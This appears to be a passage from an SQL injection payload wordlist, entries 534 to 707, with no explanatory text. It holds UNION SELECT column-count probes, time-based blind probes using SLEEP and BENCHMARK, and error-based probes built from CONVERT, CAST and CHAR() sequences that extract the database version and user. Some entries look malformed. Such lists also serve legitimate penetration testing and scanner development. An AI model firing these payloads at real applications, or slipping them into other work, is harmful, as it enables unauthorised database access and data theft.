  534. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--
  535. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--
  536. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--
  537. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
  538. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
  539. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
  540. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
  541. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
  542. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
  543. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
  544. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
  545. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
  546. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
  547. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
  548. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
  549. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
  550. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
  551. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
  552. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
  553. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
  554. UNION SELECT @@VERSION,SLEEP(5),3
  555. UNION SELECT @@VERSION,SLEEP(5),USER(),4
  556. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
  557. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
  558. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
  559. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
  560. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
  561. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
  562. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
  563. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
  564. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
  565. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
  566. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
  567. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
  568. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
  569. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
  570. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
  571. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
  572. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
  573. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
  574. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
  575. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
  576. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
  577. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
  578. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  579. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
  580. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
  581. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
  582. UNION SELECT @@VERSION,SLEEP(5),"'3
  583. UNION SELECT @@VERSION,SLEEP(5),"'3'"#
  584. UNION SELECT @@VERSION,SLEEP(5),USER(),4#
  585. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
  586. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
  587. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
  588. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
  589. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
  590. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
  591. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
  592. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
  593. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
  594. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
  595. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
  596. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
  597. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
  598. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
  599. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
  600. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
  601. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
  602. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
  603. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
  604. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
  605. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
  606. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
  607. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
  608. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
  609. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
  610. UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
  611. UNION ALL SELECT USER()--
  612. UNION ALL SELECT SLEEP(5)--
  613. UNION ALL SELECT USER(),SLEEP(5)--
  614. UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
  615. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
  616. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
  617. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
  618. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
  619. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
  620. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
  621. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
  622. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  623. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  624. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  625. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  626. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  627. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  628. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  629. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  630. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  631. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  632. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  633. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  634. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  635. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  636. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  637. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  638. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  639. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  640. UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
  641. UNION ALL SELECT NULL--
  642. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
  643. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
  644. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
  645. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
  646. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
  647. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
  648. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
  649. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
  650. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
  651. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
  652. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
  653. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
  654. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
  655. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
  656. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
  657. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
  658. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
  659. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
  660. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
  661. UNION ALL SELECT NULL#
  662. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
  663. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
  664. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
  665. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
  666. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
  667. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
  668. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
  669. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
  670. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
  671. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
  672. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
  673. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
  674. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
  675. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
  676. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
  677. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
  678. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
  679. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
  680. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
  681. UNION ALL SELECT NULL
  682. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
  683. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
  684. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
  685. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
  686. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
  687. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
  688. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
  689. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
  690. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
  691. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
  692. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
  693. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
  694. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
  695. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
  696. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
  697. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
  698. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
  699. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
  700. AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
  701. AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
  702. AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
  703. AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  704. UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
  705. UNION ALL SELECT 'INJ'||'ECT'||'XXX'
  706. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
  707. UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
